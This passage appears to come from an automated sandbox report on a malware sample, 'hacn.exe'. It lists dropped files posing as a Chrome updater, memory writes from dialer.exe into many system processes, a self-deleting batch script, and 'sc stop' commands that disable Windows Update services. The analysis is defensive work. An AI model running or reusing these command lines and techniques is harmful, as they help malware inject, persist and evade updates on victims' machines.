                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8810000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D90000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 28855150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25EF7B10000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 209A6850000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 238E5420000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 283B9F80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1FC2C760000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F095230000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1AFBEF40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 222412F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29CA4D30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2786ADF0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF380000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1F086AE0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1F086D10000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\reg.exe base: 1E5DD230000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 20D20C40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20893350000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616B760000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BA10000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 15AD96F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\reg.exe base: 1E3D8050000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208620F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208623A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 283142A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 283142D0000
                                  Source: C:\Users\user\Desktop\hacn.exeProcess created: C:\Users\user\Desktop\hacn.exe C:\Users\user\Desktop\hacn.exeJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogymJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogymJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeProcess created: C:\ProgramData\main.exe "C:\ProgramData\main.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe" Jump to behavior
                                  Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.batJump to behavior
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\System32\dialer.exeCode function: 17_2_00007FF65A131B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,17_2_00007FF65A131B54
                                  Source: C:\Windows\System32\dialer.exeCode function: 17_2_00007FF65A131B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,17_2_00007FF65A131B54
                                  Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, winlogon.exe, 00000016.00000002.2894373111.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000000.1729324605.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                                  Source: winlogon.exe, 00000016.00000002.2894373111.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000000.1729324605.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                                  Source: winlogon.exe, 00000016.00000002.2894373111.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000000.1729324605.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                                  Source: winlogon.exe, 00000016.00000002.2894373111.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000000.1729324605.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

                                  Language, Device and Operating System Detection

                                  barindex
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D349F40 cpuid 0_2_00007FF61D349F40
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: GetLocaleInfoW,GetNumberFormatW,4_2_000FAF0F
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\libcrypto-1_1.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeQueries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\main.exeQueries volume information: C:\ProgramData\main.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\main.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\main.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
